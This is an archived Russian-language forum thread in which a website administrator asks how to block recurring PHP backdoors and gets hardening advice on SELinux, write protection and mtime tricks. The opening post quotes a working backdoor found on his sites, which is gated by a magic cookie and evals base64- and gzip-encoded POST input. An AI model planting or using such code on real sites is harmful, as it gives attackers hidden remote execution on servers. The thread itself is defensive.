Suhosin и защита от back door php

0

1

Есть с десяток сайтов на них постоянно back door`ы появляются вида:

<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}
?>

и тому подобные.
посоветуйте какие функции запретить чтобы у них не было доступа к файлам сайта (иначе инклюды делают) и рассылке спама.
Сейчас начал отключать функции которые через eval идут, но многие отключить не удается, они движками сайтов используются...
так же смотрю в сторону блокировки на уровне iptables по owner output
Что еще посоветуете?

Ссылка

←	SELinux и Dovecot - не работает

nginx в chroot: а надо ли?

→

Запрет на запись в то что недолжно меняться. Cредствами файловой системы или расширеной защиты типа selinux

Jaberwock ★★★
(20.02.13 16:55:58 MSK)

Ответ на: комментарий от Jaberwock 20.02.13 16:55:58 MSK

уже думал об этом, обход файлов по дате модификации, и если старше нескольких дней то запрет на запись

commeta
(20.02.13 20:53:32 MSK) автор топика

Ответ на: комментарий от commeta 20.02.13 20:53:32 MSK

уже думал об этом, обход файлов по дате модификации

Умные взломщики первым делом меняют mtime бэкдора на прошлое :)

~~KRoN73~~ ★★★★★
(20.02.13 22:12:09 MSK)

Ответ на: комментарий от KRoN73 20.02.13 22:12:09 MSK

я не правильно выразился видимо, обход по дате модификации нужен для того чтобы определить изменяющиеся файлы в процессе работы движка, кэш и тому подобное, а остальные можно спокойно блокировать для записи, сейчас смотрю в сторону selinux

commeta
(21.02.13 12:27:41 MSK) автор топика

Ссылка

Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.

←	SELinux и Dovecot - не работает

Security

nginx в chroot: а надо ли?

→

Похожие темы